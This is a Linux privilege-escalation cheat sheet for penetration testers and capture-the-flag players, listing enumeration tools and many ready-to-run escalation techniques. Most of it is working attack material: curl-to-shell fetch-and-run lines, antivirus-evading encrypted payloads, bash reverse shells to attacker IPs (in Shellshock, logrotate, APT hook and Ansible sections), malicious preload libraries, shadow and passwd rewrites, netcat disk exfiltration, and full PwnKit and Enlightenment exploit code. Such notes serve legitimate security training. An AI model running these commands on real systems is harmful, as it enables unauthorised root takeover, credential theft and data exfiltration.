
# PrivilegeEsc Linux

{% hint style="info" %}
Check list : <https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist>
{% endhint %}

## [**01. LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

* Remote Network

```bash
## ------------------| Remote download and execute from GitHub
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh       
wget -q -O - https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh       
```

* Local Network

```bash
## ------------------| Local Network
curl 10.10.10.10/linpeas.sh | sh

## ------------------| Without CURL
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

## ------------------| Execute from memory and send the output back to the host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
wget -q -O - 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
nc -lvnp 9002 | tee linpeas.out #Host
```

* Output Format

```bash
## ------------------| Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors
```

* AV Bypass

```bash
## ------------------| open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server (Python 2; with Python 3: python3 -m http.server 80)
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

## ------------------| Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server (Python 2; with Python 3: python3 -m http.server 80)
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
```

## [02. LinEnum](https://github.com/rebootuser/LinEnum)

* Remote Network

```bash
## ------------------| Remote download and execute from GitHub
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
```

* Local Network

```bash
./LinEnum.sh -r report.out -t
# -r report.out <-- Report name
# -t            <-- Include thorough (lengthy) tests
# -e /dev/shm/  <-- Export location: copies of the interesting files LinEnum finds are written there

## [03. Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2)

```bash
./linux-exploit-suggester-2.pl -k <KernelVersion>
```

## [04. Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration)

```bash
./lse.sh -l 2 -i
```

## [05. PSPY](https://github.com/DominicBreuker/pspy)

* Linux process snooping without root permissions

* Download
  * 32 bit big, static version: `pspy32` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32)
  * 64 bit big, static version: `pspy64` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64)
  * 32 bit small version: `pspy32s` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32s)
  * 64 bit small version: `pspy64s` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s)

```bash
## ------------------| print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000 

## ------------------| place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir

## ------------------| disable printing discovered commands but enable file system events
./pspy64 -p=false -f
```

## 06. Common exploits

### 06.0 Abusing Shell Features

```bash
## ------------------| Bash < 4.2-048: an exported function can shadow a command even when the script calls it by absolute path
/bin/sh --version                                       # only works when /bin/sh is bash (dash just prints an error here)
strace -v -f -e execve /path/to/file 2>&1 | grep exec   # find which command the SUID binary executes
function /path/to/service { /bin/bash -p; }
export -f /path/to/service
/path/to/file

## ------------------| Bash < 4.4: PS4 is expanded (command substitutions included) when the child shell runs with SHELLOPTS=xtrace
/bin/sh --version
env -i SHELLOPTS=xtrace PS4='$(whoami)' /path/to/file
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/vulnbash; chmod +s /tmp/vulnbash)' /path/to/file
/tmp/vulnbash -p
```

### 06.1 Shellshock

```
Date patched      : 24 September 2014
Date discovered   : 12 September 2014
Affected software : Bash (1.0.3–4.3)
```

```bash
h4rithd='() { :; }; echo sh0ck' bash -c :
h4rithd='() { :;}; echo sh0ck' bash -c :
# If "sh0ck" is printed, bash executes the trailing command while importing the function: vulnerable.
# Control test: the same value without the function prefix must print nothing.
h4rithd='echo sh0ck' bash -c :

# Any environment variable that reaches a privileged bash works. Pick one:
env
LOGNAME='() { :;}; echo sh0ck' sudo /root/troll

## ------------------| Via a CGI script (the User-Agent header is copied into the environment)
curl -A '() { :; }; echo;echo; /bin/bash -i >& /dev/tcp/10.10.14.26/4545 0>&1' http://127.0.0.1/cgi-bin/stats
### or
curl -so shellshock.py https://www.exploit-db.com/raw/34900
python shellshock.py payload=reverse rhost=10.10.14.26 lhost=127.0.0.1 lport=4545 pages=/cgi-bin/stats
```

### 06.2 LXD

```bash
## ------------------| Check whether the current user is in the lxd group
id

## ------------------| On the attacker's machine: clone the builder and build an Alpine image
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
## ------------------| For 32 bit use -a i386 or -a i686
mv alpine-v* alpine.tar.gz
ls -al

## ------------------| Serve it
python3 -m http.server 80

## ------------------| On the victim: download the image
cd /dev/shm
wget 10.10.14.26/alpine.tar.gz

## ------------------| Import it, mount the host's / into a privileged container and get a root shell
lxc image import ./alpine.tar.gz --alias h4rithd
lxc image list
lxc init h4rithd ignite -c security.privileged=true
### if the command above errors, run "lxd init" first (accept the defaults)
lxc list
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
cd /mnt/root   # the host filesystem, writable as root
```

### [06.3 logrotate](https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges)

```bash
## Requires: logrotate rotating a log inside a directory we can write to, and a root login that sources /etc/bash_completion.d
wget https://raw.githubusercontent.com/whotwagner/logrotten/master/logrotten.c
gcc -o logrotten logrotten.c

echo "bash -i >& /dev/tcp/10.10.14.26/4545 0>&1" > shell.sh
chmod +x shell.sh
## Append to the log so it gets rotated, and let logrotten race the rotation:
## it swaps the log directory for a symlink to /etc/bash_completion.d, so the freshly created log lands there
echo "test">>/<path>/access.log; ./logrotten <path>/access.log -d
## Anything in /etc/bash_completion.d is sourced by the next interactive bash login (e.g. root's)
cp $(pwd)/shell.sh /etc/bash_completion.d/access.log
cat /etc/bash_completion.d/access.log
```

### 06.4 If you have or can?

* If you have **`LD_PRELOAD`** in `env_keep` variable?

```bash
## ------------------| Check whether env_keep contains LD_PRELOAD
sudo -l
```

`shell.c`, built as a shared object; `_init` runs when the dynamic loader maps the library, before the program's `main`:

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");   /* so the spawned shell does not load us again */
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
```

```bash
## ------------------| Compile to a shared object (.so); -nostartfiles because we supply _init ourselves
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles

## ------------------| Execute
sudo LD_PRELOAD=/tmp/shell.so <Program_Listed_in_sudo-l>
```

* If you have **`LD_LIBRARY_PATH`** in `env_keep` variable?

```bash
## ------------------| Check whether env_keep contains LD_LIBRARY_PATH
sudo -l
```

`library_path.c`, built as a shared object; the constructor runs as soon as the library is loaded:

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
```

```bash
## ------------------| Compile to a shared object (.so)
gcc -o /tmp/library_path.so -shared -fPIC library_path.c

## ------------------| Give it the name of a library the target loads (libcrypt.so.1 here);
## run ldd against the program listed in sudo -l to pick one
ldd <Program_Listed_in_sudo-l>
mv /tmp/library_path.so /tmp/libcrypt.so.1

## ------------------| Execute
sudo LD_LIBRARY_PATH=/tmp/ <Program_Listed_in_sudo-l>
```

* If you have `SETENV` in `sudo -l`?

```bash
## ------------------| Check
sudo -l | grep SETENV

## ------------------| Execute: put a malicious binary, named after a command the script calls without a full path, first in PATH
sudo PATH=/<PATH>/:$PATH /script.sh
```
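The three checks above (and the `(ALL, !root)` rule form that the sudo CVE section further down relies on) all come from reading `sudo -l` by eye. The script below is an added example, not part of the original page, that does the same triage over the text of `sudo -l` in plain POSIX shell; the sample output it runs against is constructed, and the host, user and command names in it are made up:

```shell
#!/bin/sh
# Added example (not from the original page): flag the environment weaknesses
# discussed above in `sudo -l` output:
#   - env_keep containing LD_PRELOAD or LD_LIBRARY_PATH
#   - command rules tagged SETENV:
#   - a runas list of the form (ALL, !root), worth a sudo version check
# SAMPLE_SUDO_L is a constructed sample; nothing in it is from a real host.

SAMPLE_SUDO_L='Matching Defaults entries for dev on web01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User dev may run the following commands on web01:
    (root) NOPASSWD: /usr/sbin/apache2
    (root) SETENV: NOPASSWD: /opt/scripts/backup.sh
    (ALL, !root) /bin/bash'

# sudo_l_findings <text>: print one finding per line (nothing when clean)
sudo_l_findings() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        case "$line" in
            *env_keep*)
                case "$line" in *LD_PRELOAD*)
                    echo "LD_PRELOAD survives sudo: sudo LD_PRELOAD=/tmp/shell.so <program>" ;; esac
                case "$line" in *LD_LIBRARY_PATH*)
                    echo "LD_LIBRARY_PATH survives sudo: sudo LD_LIBRARY_PATH=/tmp <program>" ;; esac ;;
        esac
        case "$line" in
            *SETENV:*)
                # everything after the last ": " is the command the rule grants
                echo "SETENV rule, PATH can be overridden: ${line##*: }" ;;
        esac
        case "$line" in
            *'!root'*)
                echo "runas list excludes root: check sudo version for CVE-2019-14287 (sudo -u#-1)" ;;
        esac
    done
}

# sudo_l_is_weak <text>: exit 0 when at least one finding exists, 1 otherwise
sudo_l_is_weak() {
    [ -n "$(sudo_l_findings "$1")" ]
}

# Stand-alone run against the constructed sample
sudo_l_findings "$SAMPLE_SUDO_L"
```

On a real host feed it the live output (`sudo_l_findings "$(sudo -l 2>/dev/null)"`); a clean `sudo -l` produces no lines and `sudo_l_is_weak` returns 1.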

* Do we have **`no_root_squash`** in **`/etc/exports`**

```bash
### With no_root_squash on a share we can write to, files created as root on our own machine keep root ownership on the server,
### so a SUID binary placed on the share runs as root on the target
## ------------------| Check if no_root_squash is present
grep no_root_squash /etc/exports

## ------------------| List the exports and mount the writable one on the attacker's machine
showmount -e <IP>
sudo mkdir -p /mnt/new
sudo mount -t nfs <IP>:/<WritableShare> /mnt/new

### Create a SUID binary (as root) inside /mnt/new, then execute it on the target from the share's path
```
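The `grep` above tells you the option exists somewhere, but `no_root_squash` is a per-client option: one share can be squashed for `*` and unsquashed for a single network. The parser below is an added example, not part of the original page, that reports which `<export> <client>` pairs actually carry the option; the exports file it runs on is a constructed sample with made-up paths and networks:

```shell
#!/bin/sh
# Added example (not from the original page): list every client entry in an
# exports file whose option list contains no_root_squash.
# SAMPLE_EXPORTS is constructed; the paths and networks are invented.

SAMPLE_EXPORTS='# constructed /etc/exports
/srv/backup   10.10.10.0/24(rw,sync,no_root_squash) *(ro,sync)
/srv/public   *(ro,sync,root_squash)
/home/dev     10.10.10.5(rw,no_subtree_check,no_root_squash,insecure)
/srv/misc     *(rw,all_squash)'

# nfs_no_root_squash <exports-text>: print "<export> <client>" for each client
# whose options contain no_root_squash. Options are per client, so the same
# share can be squashed for one network and not for another.
nfs_no_root_squash() {
    printf '%s\n' "$1" | (
        set -f   # "*" is a legal client spec; stop the shell from globbing it
        while IFS= read -r line; do
            case "$line" in ''|'#'*) continue ;; esac
            set -- $line
            export_path=$1; shift
            for client in "$@"; do
                host=${client%%"("*}
                opts=${client#*"("}; opts=${opts%")"}
                case ",$opts," in
                    *,no_root_squash,*) printf '%s %s\n' "$export_path" "$host" ;;
                esac
            done
        done
    )
}

# Stand-alone run against the constructed sample
nfs_no_root_squash "$SAMPLE_EXPORTS"
```

Once a pair is listed, mount that export on the attacker's machine as root, copy a root-owned `chmod 4755` binary onto it and run it from the victim. One caveat worth checking before building anything: if the victim mounts the share with `nosuid`, the bit is ignored.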

* If you have **write** permission to **`/etc/sudoers`** file?

```bash
### Get the current user with whoami, then add the following line
username    ALL=(ALL)    NOPASSWD: ALL

### Then run: sudo su -
```

* If you have **write** permission to **`/etc/shadow`** file?

```bash
## ------------------| Create a password hash
openssl passwd -6 -salt h4rithd h4rithd123
### -1 --> MD5
### -5 --> SHA256
### -6 --> SHA512
### the -salt flag can be omitted (a random salt is used)

### Replace the hash field in /etc/shadow with the output (h4rithd123)
$6$h4rithd$SjZ3XkShHfK9x1Rpn9RhhDH030H4cy.igvwhXGoAb93wEUM9AGR5fjR6ms/oqCqhkopN9Wj/ORX/SlUoaypYI0

### Note: this sed rewrites the hash field of EVERY line; use ^(root:) as the first group to touch only one account
sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1PASSWORD\3/g' /etc/shadow

## ------------------| one line : h4rithd123
sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1$6$\/dij\/aLbpn4NJrUW$iNXC\/blQ8FP6.kgZmpazax0RNiKBRRVwTuH5e2UFaYUQo8XOKb9aQU8hM7.e2I3omzD4Mp4XRHHzk0B2txbBW\/\3/g' /etc/shadow
```
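The `sed` one-liner above rewrites the second field of every line, which also locks out accounts whose field was `*` or `!`. The snippet below is an added example, not part of the original page, that swaps the hash of a single account and leaves the rest of the file untouched; the shadow content and the hashes in it are constructed placeholders (generate a real one with `openssl passwd -6 -salt <salt> <password>`):

```shell
#!/bin/sh
# Added example (not from the original page): replace the password hash of ONE
# account in a shadow-format file. SAMPLE_SHADOW and every hash below are
# constructed placeholders, not real crypt output.

SAMPLE_SHADOW='root:*:19500:0:99999:7:::
daemon:*:19500:0:99999:7:::
dev:$6$abc$constructedHashForDev:19500:0:99999:7:::'

# shadow_hash <file> <user>: print the current hash field of <user>
shadow_hash() {
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# set_shadow_hash <file> <user> <hash>: replace only <user>'s hash field.
# Rebuilding the record with OFS=: keeps the 9-field layout; writing a temp
# file and then mv avoids a half-written file if anything fails mid-way.
# (awk -v processes backslash escapes; crypt hashes never contain one.)
set_shadow_hash() {
    awk -F: -v OFS=: -v u="$2" -v h="$3" '$1 == u { $2 = h } { print }' "$1" > "$1.tmp" \
        && mv "$1.tmp" "$1"
}

# demo_shadow_rewrite <hash>: apply the change to a temp copy of the sample
# (root's entry) and print the temp file's path for inspection
demo_shadow_rewrite() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_SHADOW" > "$f"
    set_shadow_hash "$f" root "$1"
    printf '%s\n' "$f"
}

# Stand-alone run: show root's new hash, then clean up
f=$(demo_shadow_rewrite '$6$h4rithd$constructedHashForRoot')
shadow_hash "$f" root
rm -f "$f"
```

On a target the call is simply `set_shadow_hash /etc/shadow root "$(openssl passwd -6 -salt h4rithd h4rithd123)"`; the same function works on `/etc/passwd` if the hash is to go into the second field there instead.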

* If you have **write** permission to **`/etc/passwd`** ?

```bash
## ------------------| Create password 
openssl passwd -1 -salt h4rithd Password123 # ->> $1$h4rithd$wXIyqYpzYefGzryBsTFSU/   
   
## ------------------| Edit the passwd file
echo 'h4rithd:$1$h4rithd$wXIyqYpzYefGzryBsTFSU/:0:0:root:/root:/bin/bash' >> /etc/passwd     

## ------------------| Login to the user h4rithd
su h4rithd ## Password123
```

* Can run **`apache2`** as root user?

```bash
## ------------------| Read the first line of the shadow file: apache2 echoes the first line of the "config" in its syntax error
sudo apache2 -f /etc/shadow
## then crack the hash
```

* If you are in the **`video`** group

```bash
## The video group can read the framebuffer, i.e. whatever is on the physical screen.
## Use w to check for a tty session (someone physically logged in), then dump the framebuffer
cat /dev/fb0 > /tmp/screen.raw ## copy this file to the attacker's machine
cat /sys/class/graphics/fb0/virtual_size ## use this as the image resolution
## Open the file in GIMP as "Raw image data", set the resolution above and the colour mode to RGB565
```

* If you are in **`docker`** group

```bash
## ------------------| List docker images
docker images | awk '{print $1}' | sed '1d'

## ------------------| Use one of the images and get root by chrooting into the host filesystem
docker run -v /:/mnt --rm -it <img_name> chroot /mnt sh
```

* If you have **`apt update` on `/etc/crontab`**

```bash
## ------------------| Create the pre-invoke hook (runs as root before the next apt update)
echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/<HOSTIP>/4545 0>&1"' | base64 -w0
### paste the base64 output in place of <BASE64>; the string must end with ";" and the list with "};"
echo 'APT::Update::Pre-Invoke {"echo <BASE64> | base64 -d | bash";};' > /etc/apt/apt.conf.d/000shell
```

* If `sudo -l` only for `apt-get update` or `apt-get upgrade`?

```bash
## Watch this video
https://youtube.com/watch?v=EXuEDHFjS9E&t=2070
```

* If you see **`jdwp`** run as privilege user ??

```bash
## ------------------| First forward the JDWP port to your machine
ssh -L 8000:127.0.0.1:8000 user@ip

## ------------------| Using jdwp-shellifier [best method]
git clone https://github.com/IOActive/jdwp-shellifier
cd jdwp-shellifier
### Create the reverse shell script at /tmp/shell.sh on the victim's machine
python2 jdwp-shellifier.py -t 127.0.0.1 --break-on "java.lang.String.indexOf" --cmd "/tmp/shell.sh"

## ------------------| Or attach with jdb (the session is not persistent)
jdb -attach 8000
> classpath ### List class path
> classes   ### List classes
> threads   ### List all threads
> stop in java.lang.String.indexOf(int) ### Set a breakpoint; run the next command once it is hit
> print new java.lang.Runtime().exec("/bin/touch /tmp/hello.txt")
```

* If you are in **`disk` group** ?

```bash
## ------------------| Check if you are in the disk group
groups | grep -oP disk

## ------------------| Check if you have read/write permission on the block devices
ls -la /dev/sd*

## ------------------| Check which device holds the root filesystem
mount | grep '^\/dev'

## ------------------| Try to read it directly
strings /dev/sda1 | grep root.txt
debugfs /dev/sda1 ## then use ls / cat inside debugfs

## ------------------| If the root fs is on LVM, resolve the mapper link to the underlying dm device
ls -al /dev/mapper/Kotarak--vg-root  ## Suppose this points to "/dev/dm-0"

## ------------------| Send the whole device with netcat
nc -lvnp 8002 > disk.img.gz ## on attacker's machine
dd if=/dev/dm-0 | gzip -1 - | nc <attackers'IP> 8002

## ------------------| Mount the image on our machine
gunzip disk.img.gz
sudo mount -o ro,loop disk.img /mnt
```

* [Can run `fail2ban` with root prv](https://systemweakness.com/privilege-escalation-with-fail2ban-nopasswd-d3a6ee69db49)?

```bash
## ------------------| Check which fail2ban files are writable
find /etc -writable -ls 2>/dev/null
ls -al /etc/fail2ban/action.d/

## ------------------| Exploit
### Replace the "actionban" command in /etc/fail2ban/action.d/iptables-multiport.conf; fail2ban runs it as root when it bans an IP
sed 's/actionban =.*/actionban = chmod u+s \/bin\/bash/g' /etc/fail2ban/action.d/iptables-multiport.conf > config.conf
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
### Trigger a ban (from the attacker's machine) by failing SSH logins
hydra <IP> ssh -l root -P /usr/share/wordlists/rockyou.txt
ls -l /bin/bash
bash -p
```

* Can you run gdb (debug)?

```bash
## ------------------| Find a process running as root (example: a python script)
ps -aux | grep root | grep "python"

## ------------------| Attach gdb to that process ID (needs ptrace access to the target: CAP_SYS_PTRACE or a permissive ptrace_scope)
gdb -p <PID>

## ------------------| Call system() inside the root process
call (void)system("chmod u+s /bin/bash")
quit
bash -p
```

* If you can read `.Xauthority` file?

```bash
## ------------------| Check that it contains an MIT-MAGIC-COOKIE-1 entry, then copy it to /tmp/.Xauthority (the path used below)
xxd .Xauthority

## ------------------| Check which display is currently in use (:0)
w

## ------------------| Verify the cookie works
XAUTHORITY=/tmp/.Xauthority xdpyinfo -display :0
XAUTHORITY=/tmp/.Xauthority xwininfo -root -tree -display :0

## ------------------| Take a screenshot
XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/capture.xwd

## ------------------| Convert it on the attacker's machine
sudo apt install imagemagick -y
convert capture.xwd capture.png
```

* If you can run `dstat` tool as sudo

```bash
## ------------------| Find the plugin directories dstat searches
find / -type d -name dstat 2>/dev/null

## ------------------| Assume the writable one is "/usr/local/share/dstat"; plugins are plain Python files named dstat_<name>.py
echo "import os;os.system('chmod +s /usr/bin/bash')" > /usr/local/share/dstat/dstat_h4rithd.py
dstat --list | grep h4rithd
sudo -u root /usr/bin/dstat --h4rithd
bash -p
```

* If `doas` is available

```bash
## ------------------| Find the configuration and check which users/commands it permits
find / -type f -name doas.conf 2>/dev/null

## ------------------| Run a shell as another user (if doas.conf permits it)
doas -u root /usr/bin/bash
```

### 06.5 SUDO Vulnerability

* [CVE-2019-14287](https://www.exploit-db.com/exploits/47502)

```bash
## Sudo 1.8.27 - Security Bypass (CVE-2019-14287); needs a rule of the form (ALL, !root) in sudo -l
sudo -u#-1 /bin/bash
```

* [CVE-2021-3156](https://github.com/worawit/CVE-2021-3156)

```bash
## Sudo Baron Samedit Exploit | CVE-2021-3156
## versions 1.7.7 through 1.7.10p9, 1.8.2 through 1.8.31p2, and 1.9.0 through 1.9.5p1 are affected.
sudoedit -s '\' `perl -e 'print "A" x 65536'`
## If you receive a usage or error message, sudo is not vulnerable. If the result is a Segmentation fault, sudo is vulnerable  
```

* [CVE-2023-22809](https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc)

```bash
## ------------------| Affected sudo versions: 1.8.0 to 1.9.12p1; needs a sudoedit rule for some file in sudo -l
sudo -V

## ------------------| Exploit: the extra "-- /etc/passwd" in EDITOR is passed through to the editor as a second file
export EDITOR="vim -- /etc/passwd"
sudoedit /etc/motd
### set a user's UID and GID fields to 0, save, then su to that user
```

* [CVE‑2025‑32463](https://github.com/pr0v3rbs/CVE-2025-32463_chwoot/tree/main)

```bash
## ------------------| Affected sudo versions: v1.9.14 to 1.9.17
wget https://raw.githubusercontent.com/pr0v3rbs/CVE-2025-32463_chwoot/refs/heads/main/sudo-chwoot.sh
chmod +x sudo-chwoot.sh
./sudo-chwoot.sh
```

### 06.6 Ansible

```yaml
## ------------------| Reverse Shell (playbook task; run it, or have root's scheduled ansible-playbook pick it up)
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/<IP>/4545 0>&1'
```

### 06.7 PwnKit \[[CVE-2021-4034](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)]

```bash
## ------------------| Affected versions: 0.95 through 0.118
pkexec --version
```

`exploit.c`: pkexec re-reads `argv[0]` out of bounds when called with an empty argv, so a crafted environment makes it load our `GCONV_PATH` module as root:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = 
	"#include <stdio.h>\n"
	"#include <stdlib.h>\n"
	"#include <unistd.h>\n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
```

```bash
## ------------------| Compile and run
gcc -o exploit exploit.c
./exploit
```

### 06.8 OverlayFS 2021  \[[CVE-2021-3493](https://github.com/briskets/CVE-2021-3493)]

```bash
## ------------------| Affected Versions:
## Ubuntu 20.10, 20.04 LTS, 19.04, 18.04 LTS, 16.04 LTS, 14.04 ESM

## ------------------| Exploit
git clone https://github.com/briskets/CVE-2021-3493
cd CVE-2021-3493
## Or download a precompiled binary from here: https://github.com/h4rithd/PrecompiledBinaries/tree/main/CVE-2021-3493
gcc exploit.c -o exploit
./exploit
```

### 06.9 DirtyPipe \[[CVE-2022-0847](https://dirtypipe.cm4all.com)]

```bash
## ------------------| Abstract
## Vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files
## The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
## Precompiled --> https://github.com/h4rithd/PrecompiledBinaries/tree/main/DirtyPipe

## ------------------| Add root user
wget https://raw.githubusercontent.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit/main/exploit.c
gcc -o dpipe exploit.c
./dpipe
su root # password : aaron 

## ------------------| Change SUID binary
wget https://raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit-2.c      
gcc -o dpipe exploit-2.c
## find SUID Binary
find / -perm -4000 -ls 2>/dev/null
## Execute it as /usr/bin/pkexec
./dpipe /usr/bin/pkexec
```

### 06.10 Enlightenment \[CVE-2022-37706]

```bash
#!/bin/bash
## ------------------| Exploit script: the SUID enlightenment_sys helper passes the mount path to a shell unquoted
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
```

### 06.11 OverlayFS 2023 \[[CVE-2023-0386](https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/#how-the-cve-2023-0386-vulnerability-works)]

```bash
## ------------------| Affected Versions, if kernel version is lower than 6.2
uname -r

## ------------------| Exploits
git clone https://github.com/xkaneiki/CVE-2023-0386.git
## or download a precompiled binary from here: https://github.com/h4rithd/PrecompiledBinaries/tree/main/CVE-2023-0386
sudo apt-get install libfuse-dev libcap-dev
cd CVE-2023-0386
make all
###  Start two terminals and enter in the first terminal
./fuse ./ovlcap/lower ./gc
###  In the second terminal enter
./exp
```

### 06.12 GameOver(lay) \[[CVE-2023-2640 & CVE-2023-32629](https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/)]

```bash
## ------------------| Author's version (shell spawned from the capability-bearing copy inside the same namespace)
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash -i\")'"

## ------------------| Original poc payload
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

## ------------------| Adjusted poc payload by twitter user; likely false positive
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"
```

### 06.13 Other

```bash
## USBCreator D-Bus Privilege Escalation in Ubuntu Desktop: the Image method copies a file as root to a path we choose
gdbus call -y -d com.ubuntu.USBCreator -o /com/ubuntu/USBCreator -m com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /dev/shm/rootkey true
```

## 07. Kernel Privesc

1. [**Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation**](https://www.exploit-db.com/exploits/44298)
2. [**Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)**](https://www.exploit-db.com/exploits/37292)
